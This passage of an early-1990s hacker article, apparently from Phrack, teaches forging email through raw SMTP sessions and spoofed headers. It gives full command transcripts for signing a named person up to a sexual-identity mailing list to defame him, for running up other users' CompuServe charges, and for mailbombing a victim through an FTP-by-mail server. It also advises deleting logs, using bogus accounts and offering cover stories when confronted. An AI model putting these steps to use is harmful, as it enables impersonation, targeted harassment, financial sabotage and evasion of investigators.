  1516.  
  1517.      Finally, if the government catches you attempting to vandalize another
  1518. computer system, you will probably get some sort of heavy fine, community
  1519. service, or both.
  1520.  
  1521.      Odds of any of this happening if you are smart:  < 1%.
  1522.  
  1523.  
  1524. PRECAUTIONS SUGGESTED:
  1525.  
  1526.      If you have a bogus computer account (standard issue hacker necessity)
  1527. then for crissake use that.  Don't let "them" know who really is hacking
  1528. around.  (Point of clarification, I refer to "them" an awful lot in RL and in
  1529. philes.  "They" are the boneheadded "do-gooders" who try to blame their own
  1530. lack of productivity or creativity on your committing of pseudo-crimes with a
  1531. computer.  FBI, SS, administrators, accountants, SPA "Don't Copy that Floppy"
  1532. fucks, religious quacks, stupid rednecks, right wing conservative Republican
  1533. activists, pigs, NSA, politicians who still THINK they can control us, city
  1534. officials, judges, lame jurors that think a "hacker" only gets
  1535. slap-in-the-wrist punishments, lobbyists who want to blame their own failed
  1536. software on kids, bankers, investors, and probably every last appalled person
  1537. in Stifino's Italian Restaurant when the Colorado 2600 meeting was held there
  1538. last month.  Enough of the paranoid Illuminati shit, back to the phile.)
  1539.  
  1540.      Make sure that you delete history files, logs, etc. if you have
  1541. access to them.  Try using computers that don't keep logs.  Check /usr/adm,
  1542. /etc/logs to see what logs are kept.
  1543.  
  1544.      If you can avoid using your local host (since you value network
  1545. connections in general), do so.  It can avert suspicion that your host contains
  1546. "hackers."
  1547.  
  1548.  
  1549. IF YOU EVER ARE CONFRONTED:
  1550.  
  1551.      "They must have broken into that account from some other site!"
  1552.  
  1553.      "Hackers?  Around here?  I never check 'who' when I log in."
  1554.  
  1555.      "They could have been super-user -- keep an eye out to see if the scum
  1556.       comes back."
  1557.  
  1558.      "Come on, they are probably making a big deal out of nothing.  What could
  1559.       be in e-mail that would be so bad?"
  1560.  
  1561.      "Just delete the account and the culprit will be in your office tomorrow
  1562.       morning."   (Of course, you used a bogus account.)
  1563.  
  1564.  
  1565. PART ONE:  ELECTRONIC MAIL
  1566.  
  1567.      Basically, electronic mail has become the new medium of choice for
  1568. delivering thoughts in a hurry.  It is faster than the post office, cheaper
  1569. than the post office, doesn't take vacations all the time like the post office,
  1570. and is completely free so it doesn't have unions.
  1571.  
  1572.      Of course, you know all that and would rather spend this time making damn
  1573. sure you know what SMTP is.
  1574.  
  1575.      To my knowledge, a completely accurate SMTP set of protocols hasn't been
  1576. published in any hacker journal.  The original (at least, the first I've seen)
  1577. was published in the Legion of Doom Technical Journals and covered the minimum
  1578. SMTP steps necessary for the program "sendmail," found in a typical Unix
  1579. software package.
  1580.  
  1581.      When you connect a raw socket to a remote SMTP compatible host, your
  1582. computer is expected to give a set of commands which will result in having the
  1583. sender, receiver, and message being transferred.  However, unlike people who
  1584. prefer the speed of compression and security of raw integer data, the folks at
  1585. DARPA decided that SMTP would be pretty close to English.
  1586.  
  1587.      If you are on the Internet, and you wanted to connect to the SMTP server,
  1588. type:
  1589.  
  1590.        telnet <hostname> 25
  1591.  
  1592.      Port 25 is the standard port for SMTP.  I doubt it would be too cool to
  1593. change this, since many mail servers connect to the target hosts directly.
  1594.  
  1595. [Editor's Note:  All mail and SMTP commands have been offset by a ">" at the
  1596.  beginning of each line in order not to confuse Internet mailers when sending
  1597.  this article through e-mail.]
  1598.  
  1599.      When you connect, you will get a small hostname identifier for whatever
  1600. SMTP server revision you've got.
  1601.  
  1602. 220 huggies.colorado.edu Sendmail 2.2/2.5 8/01/88 ready at Tue, 25 Aug 91
  1603. 03:14:55 edt
  1604.  
  1605.      Now that you are connected, the computer is waiting for commands.  First
  1606. of all, you are expected to explain which computer you are calling in from.
  1607. This is done with the HELO <host> command.  This can be anything at all, but if
  1608. you fail to give the exact host that you are connecting from, it causes the
  1609. following line to appear on the e-mail message the recipient gets from you:
  1610.  
  1611. > Apparently-to:  The Racketeer <rack@lycaeum.hfc.com>
  1612.  
  1613.      Instead of the classic:
  1614.  
  1615. > To:  The Racketeer <rack@lycaeum.hfc.com>
  1616.  
  1617.      This is the secret to great fakemail -- the ability to avoid the
  1618. "apparently-to" flag.  Although it is subtle, it is a pain to avoid.  In fact,
  1619. in some places, there are so many "protections" to SMTP that every outside
  1620. e-mail is marked with "Apparently-to."  Hey, their problem.
  1621.  
  1622.      So, go ahead and type the HELO command:
  1623.  
  1624. > HELO LYCAEUM.HFC.COM
  1625.  
  1626. The computer replies:
  1627.  
  1628. 250 huggies.colorado.edu Hello LYCAEUM.HFC.COM, pleased to meet you
  1629.  
  1630.     Oh, a warm reception.  Older sendmail software explains with the HELP
  1631. command that the computer doesn't care about HELO commands.  You can check it
  1632. upon login with the command "HELP HELO."
  1633.  
  1634.     Now what you will need to do is tell the computer who is supposed to get
  1635. the letter.  From this point, there are all sorts of possibilities.  First of
  1636. all, the format for the recipient would be:
  1637.  
  1638. > RCPT TO: <name@host>
  1639.  
  1640.     And *NOTE*, the "<" and ">" symbols should be present!  Some computers,
  1641. especially sticklers like Prime, won't even accept the letters unless they
  1642. adhere specifically to the protocol!  Now, if you give a local address name,
  1643. such as:
  1644.  
  1645. > RCPT TO: <smith>
  1646.  
  1647.     ...then it will treat the mail as if it were sent locally, even though it
  1648. was sent through the Internet.  Giving a computer its own host name is valid,
  1649. although there is a chance that it will claim that the machine you are calling
  1650. from had something to do with it.
  1651.  
  1652. > RCPT TO: <smith@thishost>
  1653.  
  1654.     ...will check to see if there is a "smith" at this particular computer.  If
  1655. the computer finds "smith," then it will tell you there is no problem.  If you
  1656. decide to use this computer as a forwarding host (between two other points),
  1657. you can type:
  1658.  
  1659. > RCPT TO: <smith@someotherhost>
  1660.  
  1661.      This will cause the mail to be forwarded to someotherhost's SMTP port and
  1662. the letter will no longer be a problem for you.  I'll be using this trick to
  1663. send my letter around the world.
  1664.  
  1665.      Now, after you have given the name of the person who is to receive the
  1666. letter, you have to tell the computer who is sending it.
  1667.  
  1668. > MAIL FROM: <rack@lycaeum.hfc.com>      ; Really from
  1669. > MAIL FROM: <rack>                      ; Localhost
  1670. > MAIL FROM: <rack@osi.mil>              ; Fake -- "3rd party host"
  1671. > MAIL FROM: <lycaeum.hfc.com|rack>      ; UUCP Path
  1672.  
  1673.      Essentially, if you claim the letter is from a "3rd party," then the other
  1674. machine will accept it due to UUCP style routing.  This will be explained later
  1675. on.
  1676.  
  1677.      The next step is actually entering the e-mail message.  The first few
  1678. lines of each message consists of the message title, X-Messages, headers,
  1679. Forwarding Lines, etc.  These are completely up to the individual mail program,
  1680. but a few simple standards will be printed later, but first let's run through
  1681. the step-by-step way to send fakemail.  You type anything that isn't preceded
  1682. by a number.
  1683.  
  1684. 220 hal.gnu.ai.mit.edu Sendmail AIX 3.2/UCB 5.64/4.0 ready at Tue, 21 Jul 1992
  1685. 22:15:03 -0400
  1686. > helo lycaeum.hfc.com
  1687. 250 hal.gnu.ai.mit.edu Hello lycaeum.hfc.com, pleased to meet you
  1688. > mail from: <rack@lycaeum.hfc.com>
  1689. 250 <rack@lycaeum.hfc.com>... Sender ok
  1690. > rcpt to: <phrack@gnu.ai.mit.edu>
  1691. 250 <phrack@gnu.ai.mit.edu>... Recipient ok
  1692. > data
  1693. 354 Enter mail, end with "." on a line by itself
  1694. > Yo, C.D. -- mind letting me use this account?
  1695. > .
  1696. 250 Ok
  1697. > quit
  1698.  
  1699.      Now, here are a few more advanced ways of using sendmail.  First of all,
  1700. there is the VRFY command.  You can use this for two basic things:  checking up
  1701. on a single user or checking up on a list of users.  Anyone with basic
  1702. knowledge of ANY of the major computer networks knows that there are mailing
  1703. lists which allow several people to share mail.  You can use the VRFY command
  1704. to view every member on the entire list.
  1705.  
  1706. > vrfy phrack
  1707. 250 Phrack Classic <phrack>
  1708.  
  1709.      Or, to see everyone on a mailing list:
  1710.  
  1711. > vrfy phrack-staff-list
  1712. 250 Knight Lightning <kl@stormking.com>
  1713. 250 Dispater <dispater@stormking.com>
  1714.  
  1715.      Note - this isn't the same thing as a LISTSERV -- like the one that
  1716. distributes Phrack.  LISTSERVs themselves are quite powerful tools because they
  1717. allow people to sign on and off of lists without human moderation.  Alias lists
  1718. are a serious problem to moderate effectively.
  1719.  
  1720.      This can be useful to just check to see if an account exists.  It can be
  1721. helpful if you suspect a machine has a hacked finger daemon or something to
  1722. hide the user's identity.  Getting a list of users from mailing lists doesn't
  1723. have a great deal of uses, but if you are trying very hard to learn someone's
  1724. real identity, and you suspect they are signed up to a list, just check for all
  1725. users from that particular host site and see if there are any matches.
  1726.  
  1727.      Finally, there is one last section to e-mail -- the actual message itself.
  1728. In fact, this is the most important area to concentrate on in order to avoid
  1729. the infamous "Apparently-to:" line.  Basically, the data consists of a few
  1730. lines of title information and then the actual message follows.
  1731.  
  1732.      There is a set of guidelines you must follow in order for the quotes to
  1733. appear in correct order.  You won't want to have a space separate your titles
  1734. from your name, for example.  Here is an example of a real e-mail message:
  1735.  
  1736. > From: rack@lycaeum.hfc.com
  1737. > Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92
  1738. > 12:00:00
  1739. > Message-Id: <666.AA10000@dockmaster.ncsc.mil>
  1740. > To: RMorris@dockmaster.ncsc.mil
  1741. > Date: Thu, 06 Feb 92 12:00:00
  1742. > Title: *wave* Hello, No Such Agency dude!
  1743. >
  1744. > NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
  1745.  
  1746.     Likewise, if you try to create a message without an information line, your
  1747. message would look something like this:
  1748.  
  1749. > From: rack@lycaeum.hfc.com
  1750. > Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92
  1751. > 12:00:00 -0500
  1752. > Message-Id: <666.AA10000@dockmaster.ncsc.mil>
  1753. > Date: Thu, 06 Feb 92 12:00:00
  1754. > Apparently-to: RMorris@dockmaster.ncsc.mil
  1755.  
  1756. > NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
  1757.  
  1758.      Basically, this looks pretty obvious that it's fakemail, not because I
  1759. altered the numbers necessarily, but because it doesn't have a title line, it
  1760. doesn't have the "Date:" in the right place, and because the "Apparently-to:"
  1761. designation was on.
  1762.  
  1763.     To create the "realistic" e-mail, you would enter:
  1764.  
  1765. > helo lycaeum.hfc.com
  1766. > mail from: <rack@lycaeum.hfc.com>
  1767. > rcpt to: <RMorris@docmaster.ncsc.mil>
  1768. > data
  1769. > To:  RMorris@dockmaster.ncsc.mil>
  1770. > Date: Thu, 06 Feb 92 12:00:00
  1771. > Title: *wave* Hello, No Such Agency dude!
  1772. >
  1773. > NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
  1774. > .
  1775.  
  1776.      Notice that, even though you are in "data" mode, you are still giving
  1777. commands to sendmail.  All of the lines can (even if only partially) be altered
  1778. through the data command.  This is perfect for sending good fakemail.  For
  1779. example:
  1780.  
  1781. > helo lycaeum.hfc.com
  1782. > mail from: <dale@opus.tymnet.com>
  1783. > rcpt to: <listserv@brownvm.brown.edu>
  1784. > data
  1785. > Received: by lycaeum.hfc.com (5.12/3.7) id AA11891; Thu 6 Feb 92 12:00:00
  1786. > Message-Id: <230.AA11891@lycaeum.hfc.com>
  1787. > To: <listserv@brownvm.brown.edu>
  1788. > Date: Thu, 06 Feb 92 12:00:00
  1789. > Title:  Ohh, sign me up Puuuleeeze.
  1790. >
  1791. > subscribe BISEXU-L Dale "Fist Me" Drew
  1792. > .
  1793.  
  1794.      Now, according to this e-mail path, you are telling the other computer
  1795. that you received this letter from OPUS.TYMNET.COM, and it is being forwarded
  1796. by your machine to BROWNVM.BROWN.EDU.  Basically, you are stepping into the
  1797. middle of the line and claiming you've been waiting there all this time.  This
  1798. is a legit method of sending e-mail!
  1799.  
  1800.      Originally, when sendmail was less automated, you had to list every
  1801. computer that your mail had to move between in order for it to arrive.  If you
  1802. were computer ALPHA, you'd have to send e-mail to account "joe" on computer
  1803. GAMMA by this address:
  1804.  
  1805. > mail to: <beta!ceti!delta!epsilon!freddy!gamma!joe>
  1806.  
  1807.      Notice that the account name goes last and the host names "lead" up to
  1808. that account.  The e-mail will be routed directly to each machine until it
  1809. finally reaches GAMMA.  This is still required today, especially between
  1810. networks like Internet and Bitnet -- where certain hosts are capable of sending
  1811. mail between networks.  This particular style of sending e-mail is called "UUCP
  1812. Style" routing.
  1813.  
  1814.      Sometimes, hosts will use the forwarding UUCP style mail addresses in case
  1815. the host has no concept of how to deal with a name address.  Your machine
  1816. simply routes the e-mail to a second host which is capable of resolving the
  1817. rest of the name.  Although these machines are going out of style, they still
  1818. exist.
  1819.  
  1820.      The third reasonable case of where e-mail will be routed between hosts is
  1821. when, instead of having each computer waste individual time dealing with each
  1822. piece of e-mail that comes about, the computer gives the mail to a dedicated
  1823. mailserver which will then deliver the mail.  This is quite common all over the
  1824. network -- especially due to the fact that the Internet is only a few T1 lines
  1825. in comparison to the multitude of 9600 and 14.4K baud modems that everyone is
  1826. so protective of people over-using.  Of course, this doesn't cause the address
  1827. to be in UUCP format, but when it reaches the other end of the network, it'll
  1828. be impossible to tell what method the letter used to get sent.
  1829.  
  1830.      Okay, now we can send fairly reasonable electronic fakemail.  This stuff
  1831. can't easily be distinguished between regular e-mail unless you either really
  1832. botched it up (say, sending fakemail between two people on the same machine by
  1833. way of 4 national hosts or something) or really had bad timing.
  1834.  
  1835.      Let's now discuss the POWER of fakemail.  Fakemail itself is basically a
  1836. great way to fool people into thinking you are someone else.  You could try to
  1837. social engineer information out of people on a machine by fakemail, but at the
  1838. same time, why not just hack the root password and use "root" to do it?  This
  1839. way you can get the reply to the mail as well.  It doesn't seem reasonable to
  1840. social engineer anything while you are root either.  Who knows.  Maybe a really
  1841. great opportunity will pop up some day -- but until then, let's forget about
  1842. dealing person-to-person with fakemail, and instead deal with
  1843. person-to-machine.
  1844.  
  1845.      There are many places on the Internet that respond to received electronic
  1846. mail automatically.  You have all of the Archie sites that will respond, all of
  1847. the Internet/Bitnet LISTSERVs, and Bitmail FTP servers.  Actually, there are
  1848. several other servers, too, such as the diplomacy adjudicator.  Unfortunately,
  1849. this isn't anywhere nearly as annoying as what you can do with other servers.
  1850.  
  1851.      First, let's cover LISTSERVs.  As you saw above, I created a fakemail
  1852. message that would sign up Mr. Dale Drew to the BISEXU-L LISTSERV.  This means
  1853. that any of the "netnews" regarding bisexual behavior on the Internet would be
  1854. sent directly to his mailbox.  He would be on this list (which is public and
  1855. accessible by anyone) and likewise be assumed to be a member of the network
  1856. bisexual community.
  1857.  
  1858.      This fakemail message would go all the way to the LISTSERV, it would
  1859. register Mr. Dictator for the BISEXU-L list, >DISCARD< my message, and, because
  1860. it thinks that Dale Drew sent the message, it will go ahead and sign him up to
  1861. receive all the bisexual information on the network.
  1862.  
  1863.      And people wonder why I don't even give out my e-mail address.
  1864.  
  1865.      The complete list of all groups on the Internet is available in the file
  1866. "list_of_lists" which is available almost everywhere so poke around
  1867. wuarchive.wustl.edu or ftp.uu.net until you find it.  You'll notice that there
  1868. are several groups that are quite fanatic and would freak out nearly anybody
  1869. who was suddenly signed up to one.
  1870.  
  1871.      Ever notice how big mega-companies like IBM squelch little people who try
  1872. to make copies of their ideas?  Even though you cannot "patent" an "idea,"
  1873. folks like IBM want you to believe they can.  They send their "brute" squad of
  1874. cheap lawyers to "legal-fee-to-death" small firms.  If you wanted to
  1875. "nickel-and-dime" someone out of existence, try considering the following:
  1876.  
  1877.      CompuServe is now taking electronic mail from the Internet.  This is good.
  1878. CompuServe charges for wasting too much of their drive space with stored
  1879. e-mail.  This is bad.  You can really freak out someone you don't like on
  1880. CompuServe by signing them up to the Dungeons and Dragons list, complete with
  1881. several megabytes of fluff per day.  This is cool.  They will then get charged
  1882. hefty fines by CompuServe.  That is fucked up.  How the hell could they know?
  1883.  
  1884.     CompuServe e-mail addresses are userid@compuserve.com, but as the Internet
  1885. users realize, they can't send commas (",") as e-mail paths.  Therefore, use a
  1886. period in place of every comma.  If your e-mail address was 767,04821 on
  1887. CompuServe then it would be 767.04821 for the Internet. CompuServe tends to
  1888. "chop" most of the message headers that Internet creates out of the mail before
  1889. it reaches the end user.  This makes them particularly vulnerable to fakemail.
  1890.  
  1891.      You'll have to check with your individual pay services, but I believe such
  1892. groups as MCI Mail also have time limitations.  Your typical non-Internet-
  1893. knowing schmuck would never figure out how to sign off of some God-awful fluff
  1894. contained LISTSERV such as the Advanced Dungeons & Dragons list.  The amount of
  1895. damage you could cause in monetary value alone to an account would be
  1896. horrendous.
  1897.  
  1898.      Some groups charge for connection time to the Internet -- admittedly, the
  1899. fees are reasonable -- I've seen the price at about $2 per hour for
  1900. communications.  However, late at night, you could cause massive e-mail traffic
  1901. on some poor sap's line that they might not catch.  They don't have a way to
  1902. shut this off, so they are basically screwed.  Be WARY, though -- this sabotage
  1903. could land you in deep shit.  It isn't actually fraud, but it could be
  1904. considered "unauthorized usage of equipment" and could get you a serious fine.
  1905. However, if you are good enough, you won't get caught and the poor fucks will
  1906. have to pay the fees themselves!
  1907.  
  1908.      Now let's investigate short-term VOLUME damage to an e-mail address.
  1909. There are several anonymous FTP sites that exist out there with a service known
  1910. as BIT FTP.  This means that a user from Bitnet, or one who just has e-mail and
  1911. no other network services, can still download files off of an FTP site.  The
  1912. "help" file on this is stored in Appendix C, regarding the usage of Digital's
  1913. FTP mail server.
  1914.  
  1915.      Basically, if you wanted to fool the FTP Mail Server into bombarding some
  1916. poor slob with an ungodly huge amount of mail, try doing a regular "fakemail"
  1917. on the guy, with the enclosed message packet:
  1918.  
  1919. > helo lycaeum.hfc.com
  1920. > mail from: <dale@opus.tymnet.com>
  1921. > rcpt to: <ftpmail@decwrl.dec.com>
  1922. > data
  1923. > Received: by lycaeum.hfc.com (5.12/3.7) id AA10992; Fri 9 Oct 92 12:00:00
  1924. > Message-Id: <230.AA11891@lycaeum.hfc.com>
  1925. > To: <listserv@brownvm.brown.edu>
  1926. > Date: Fri, 09 Oct 92 12:00:00
  1927. > Title:  Hey, I don't have THAT nifty program!
  1928. >
  1929. > reply dale@opus.tymnet.com
  1930. > connect wuarchive.wustl.edu anonymous fistme@opus.tymnet.com
  1931. > binary
  1932. > get mirrors/gnu/gcc-2.3.2.tar.Z
  1933. > quit
  1934. > .
  1935.  
  1936.         What is particularly nasty about this is that somewhere between 15 and
  1937. 20 megabytes of messages are going to be dumped into this poor guy's account.
  1938. All of the files will be uuencoded and broken down into separate messages!
  1939. Instead of deleting just one file, there will be literally hundreds of messages
  1940. to delete!  Obnoxious!  Nearly impossible to trace, too!
  1941.  
  1942.  
  1943. Part 2:  E-MAIL AROUND THE WORLD
  1944.  
  1945.      Captain Crunch happened to make a telephone call around the world, which
  1946. could have ushered in the age of phreak enlightenment -- after all, he proved
  1947. that, through the telephone, you could "touch someone" anywhere you wanted
  1948. around the world!  Billions of people could be contacted.
  1949.  
  1950.      I undoubtedly pissed off a great number of people trying to do this e-mail
  1951. trick -- having gotten automated complaints from many hosts.  Apparently, every
  1952. country has some form of NSA.  This doesn't surprise me at all, I'm just
  1953. somewhat amazed that entire HOSTS were disconnected during the times I used
  1954. them for routers.  Fortunately, I was able to switch computers faster than they
  1955. were able to disconnect them.
  1956.  
  1957.      In order to send the e-mail, I couldn't send it through a direct path.
  1958. What I had to do was execute UUCP style routing, meaning I told each host in
  1959. the path to send the e-mail to the next host in the path, etc., until the last
  1960. machine was done.  Unfortunately, the first machine I used for sending the
  1961. e-mail had a remarkably efficient router and resolved the fact that the target
  1962. was indeed the destination.  Therefore, I re-altered the path to a machine
  1963. sitting about, oh, two feet away from it.  Those two feet are meaningless in
  1964. this epic journey.
  1965.  
  1966.       The originating host names have been altered as to conceal my identity.
  1967. However, if we ever meet at a Con, I'll probably have the real print-out of the
  1968. results somewhere and you can verify its authenticity.  Regardless, most of
  1969. this same shit will work from just about any typical college campus Internet
  1970. (and even Bitnet) connected machines.
  1971.  
  1972.      In APPENDIX A, I've compiled a list of every foreign country that I could
  1973. locate on the Internet.  I figured it was relatively important to keep with the
  1974. global program and pick a series of hosts to route through that would
  1975. presumably require relatively short hops.  I did this by using this list and
  1976. trial and error (most of this information was procured from the Network
  1977. Information Center, even though they deliberately went way the hell out of
  1978. their way to make it difficult to get computers associated with foreign
  1979. countries).
  1980.  
  1981.      My ultimate choice of a path was:
  1982.  
  1983.      lycaeum.hfc.com           -- Origin, "middle" America.
  1984.      albert.gnu.ai.mit.edu     -- Massachusetts, USA.
  1985.      isgate.is                 -- Iceland
  1986.      chenas.inria.fr           -- France
  1987.      icnucevx.cnuce.cn.it      -- Italy
  1988.      sangram.ncst.ernet.in     -- India
  1989.      waseda-mail.waseda.ac.jp  -- Japan
  1990.      seattleu.edu              -- Seattle
  1991.      inferno.hfc.com           -- Ultimate Destination
  1992.  
  1993.      The e-mail address came out to be:
  1994.  
  1995. isgate.is!chenas.inria.fr!icnucevx.cnuce.cn.it!sangram.ncst.ernet.in!
  1996. waseda-mail.waseda.ac.jp!seattleu.edu!inferno.hfc.com!
  1997. rack@albert.gnu.ai.mit.edu
  1998.  
  1999.      ...meaning, first e-mail albert.gnu.ai.mit.edu, and let it parse the name
  2000. down a line, going to Iceland, then to France, etc. until it finally reaches
  2001. the last host on the list before the name, which is the Inferno, and deposits
  2002. the e-mail at rack@inferno.hfc.com.
  2003.  
  2004.      This takes a LONG time, folks.  Every failure toward the end took on
  2005. average of 8-10 hours before the e-mail was returned to me with the failure
  2006. message. In one case, in fact, the e-mail made it shore to shore and then came
  2007. all the way back because it couldn't resolve the last hostname!  That one made
  2008. it (distance-wise) all the way around the world and half again.
  2009.  
  2010.      Here is the final e-mail that I received (with dates, times, and numbers
  2011.      altered to squelch any attempt to track me):
  2012.  
  2013. > Return-Path: <rack@lycaeum.hfc.com>
  2014. > Received: from sumax.seattleu.edu [192.48.211.120] by Lyceaum.HFC.Com ; 19
  2015.         Dec 92 16:23:21 MST
  2016. > Received: from waseda-mail.waseda.ac.jp by sumax.seattleu.edu with SMTP id
  2017. >         AA28431 (5.65a/IDA-1.4.2 for rack@inferno.hfc.com); Sat, 19 Dec 92
  2018. >         14:26:01 -0800
  2019. > Received: from relay2.UU.NET by waseda-mail.waseda.ac.jp (5.67+1.6W/2.8Wb)
  2020. >         id AA28431; Sun, 20 Dec 92 07:24:04 JST
  2021. > Return-Path: <rack@lycaeum.hfc.com>
  2022. > Received: from uunet.uu.net (via LOCALHOST.UU.NET) by relay2.UU.NET with SMTP
  2023. >         (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:24:08 -
  2024. >         0500
  2025. > Received: from sangam.UUCP by uunet.uu.net with UUCP/RMAIL
  2026. >         (queueing-rmail) id 182330.3000; Sat, 19 Dec 1992 17:23:30 EST
  2027. > Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
  2028. >         id AA28431; Sun, 20 Dec 92 03:50:19 IST
  2029. > From: rack@lycaeum.hfc.com
  2030. > Received: from shakti.ncst.ernet.in by saathi.ncst.ernet.in
  2031. >         (5.61/Ultrix3.0-C)
  2032. >         id AA28431; Sun, 20 Dec 92 03:52:12 +0530
  2033. > Received: from saathi.ncst.ernet.in by shakti.ncst.ernet.in with SMTP
  2034. >         (16.6/16.2) id AA09700; Sun, 20 Dec 92 03:51:37 +0530
  2035. > Received: by saathi.ncst.ernet.in (5.61/Ultrix3.0-C)
  2036. >         id AA28431; Sun, 20 Dec 92 03:52:09 +0530
  2037. > Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
  2038. >         id AA28431; Sun, 20 Dec 92 03:48:24 IST
  2039. > Received: from ICNUCEVX.CNUCE.CNR.IT by relay1.UU.NET with SMTP
  2040. >         (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:20:23
  2041. >         -0500
  2042. > Received: from chenas.inria.fr by ICNUCEVX.CNUCE.CNR.IT (PMDF #2961 ) id
  2043. >  <01GSIP122UOW000FBT@ICNUCEVX.CNUCE.CNR.IT>; Sun, 19 Dec 1992 23:14:29 MET
  2044. > Received: from isgate.is by chenas.inria.fr (5.65c8d/92.02.29) via Fnet-EUnet
  2045. >  id AA28431; Sun, 19 Dec 1992 23:19:58 +0100 (MET)
  2046. > Received: from albert.gnu.ai.mit.edu by isgate.is (5.65c8/ISnet/14-10-91);
  2047. > Sat, 19 Dec 1992 22:19:50 GMT
  2048. > Received: from lycaeum.hfc.com by albert.gnu.ai.mit.edu (5.65/4.0) with
  2049. >  SMTP id <AA28431@albert.gnu.ai.mit.edu>; Sat, 19 Dec 92 17:19:36 -0500
  2050. > Received: by lycaeum.hfc.com (5.65/4.0) id <AA11368@lycaeum.hfc.com>;
  2051. >  Sat, 19 Dec 92 17:19:51 -0501
  2052. > Date: 19 Dec 1992 17:19:50 -0500 (EST)
  2053. > Subject: Global E-Mail
  2054. > To:   rack@inferno.hfc.com
  2055. > Message-id: <9212192666.AA11368@lycaeum.hfc.com>
  2056. > Mime-Version: 1.0
  2057. > Content-Type: text/plain; charset=US-ASCII
  2058. > Content-Transfer-Encoding: 7bit
  2059. > X-Mailer: ELM [version 2.4 PL5]
  2060. > Content-Length: 94
  2061. > X-Charset: ASCII
  2062. > X-Char-Esc: 29
  2063. >
  2064. > This Electronic Mail has been completely around the world!
  2065. >
  2066. > (and isn't even a chain letter.)
  2067.  
  2068. ===============================================================================
  2069.  
  2070. APPENDIX A:
  2071.  
  2072. List of Countries on the Internet by Root Domain
  2073.  
  2074. (I tried to get a single mail router in each domain.  The domains that don't
  2075.  have them are unavailable at my security clearance.  The computer is your
  2076.  friend.)
  2077.  
  2078. .AQ        New Zealand
  2079. .AR        Argentina        atina.ar
  2080. .AT        Austria          pythia.eduz.univie.ac.at
  2081. .BB        Barbados
  2082. .BE        Belgium          ub4b.buug.be
  2083. .BG        Bulgaria
  2084. .BO        Bolivia          unbol.bo
  2085. .BR        Brazil           fpsp.fapesp.br
  2086. .BS        Bahamas
  2087. .BZ        Belize
  2088. .CA        Canada           cs.ucb.ca
  2089. .CH        Switzerland      switch.ch
  2090. .CL        Chile            uchdcc.uchile.cl
  2091. .CN        China            ica.beijing.canet.cn
  2092. .CR        Costa Rica       huracan.cr
  2093. .CU        Cuba
  2094. .DE        Germany          deins.informatik.uni-dortmund.de
  2095. .DK        Denmark          dkuug.dk
  2096. .EC        Ecuador          ecuanex.ec
  2097. .EE        Estonia          kbfi.ee
  2098. .EG        Egypt
  2099. .FI        Finland          funet.fi
  2100. .FJ        Fiji
  2101. .FR        France           inria.inria.fr
  2102. .GB        England
  2103. .GR        Greece           csi.forth.gr
  2104. .HK        Hong Kong        hp9000.csc.cuhk.hk
  2105. .HU        Hungary          sztaki.hu
  2106. .IE        Ireland          nova.ucd.ie
  2107. .IL        Israel           relay.huji.ac.il
  2108. .IN        India            shakti.ernet.in
  2109. .IS        Iceland          isgate.is
  2110. .IT        Italy            deccnaf.infn.it
  2111. .JM        Jamaica
  2112. .JP        Japan            jp-gate.wide.ad.jp
  2113. .KR        South Korea      kum.kaist.ac.kr
  2114. .LK        Sri Lanka        cse.mrt.ac.lk
  2115. .LT        Lithuania        ma-mii.lt.su
  2116. .LV        Latvia
  2117. .MX        Mexico           mtec1.mty.itesm.mx
  2118. .MY        Malaysia         rangkom.my
  2119. .NA        Namibia
  2120. .NI        Nicaragua        uni.ni
  2121. .NL        Netherlands      sering.cwi.nl
  2122. .NO        Norway           ifi.uio.no
  2123. .NZ        New Zealand      waikato.ac.nz
  2124. .PE        Peru             desco.pe
  2125. .PG        New Guinea       ee.unitech.ac.pg
  2126. .PH        Philippines
  2127. .PK        Pakistan
  2128. .PL        Poland
  2129. .PR        Puerto Rico      sun386-gauss.pr
  2130. .PT        Portugal         ptifm2.ifm.rccn.pt
  2131. .PY        Paraguay         ledip.py
  2132. .SE        Sweden           sunic.sunet.se
  2133. .SG        Singapore        nuscc.nus.sg
  2134. .TH        Thailand
  2135. .TN        Tunisia          spiky.rsinet.tn
  2136. .TR        Turkey
  2137. .TT        Trinidad & Tobago
  2138. .TW        Taiwan           twnmoe10.edu.tw
  2139. .UK        United Kingdom   ess.cs.ucl.ac.uk
  2140. .US        United States    isi.edu
  2141. .UY        Uruguay          seciu.uy
  2142. .VE        Venezuela
  2143. .ZA        South Africa     hippo.ru.ac.za
  2144. .ZW        Zimbabwe         zimbix.uz.zw
  2145.  
  2146. ===============================================================================
  2147.  
  2148. APPENDIX B:
  2149.  
  2150. Basic SMTP Commands
  2151.  
  2152. > HELO <hostname>           Tells mail daemon what machine is calling.  This
  2153.                             will be determined anyway, so omission doesn't mean
  2154.                             anonymity.
  2155.  
  2156. > MAIL FROM: <path>         Tells where the mail came from.
  2157.  
  2158. > RCPT TO: <path>           Tells where the mail is going.
  2159.  
  2160. > DATA                      Command to start transmitting message.
  2161.  
  2162. > QUIT                      Quit mail daemon, disconnects socket.
  2163.  
  2164. > NOOP                      No Operation -- used for delays.
  2165.  
  2166. > HELP                      Gives list of commands -- sometimes disabled.
  2167.  
  2168. > VRFY                      Verifies if a path is valid on that machine.
  2169.  
  2170. > TICK                      Number of "ticks" from connection to present
  2171.                             ("0001" is a typical straight connection).
  2172.  
  2173. ===============================================================================
  2174.  
  2175. APPENDIX C:
  2176.  
  2177. BIT-FTP Help File
  2178.  
  2179.    ftpmail@decwrl.dec.com (Digital FTP mail server)
  2180.  
  2181.    Commands are:
  2182.     reply <MAILADDR>              Set reply address since headers are usually
  2183.                                   wrong.
  2184.     connect [HOST [USER [PASS]]]  Defaults to gatekeeper.dec.com, anonymous.
  2185.     ascii                         Files grabbed are printable ASCII.
  2186.     binary                        Files grabbed are compressed or tar or both.
  2187.     compress                      Compress binaries using Lempel-Ziv encoding.
  2188.     compact                       Compress binaries using Huffman encoding.
  2189.     uuencode                      Binary files will be mailed in uuencoded
  2190.                                   format.
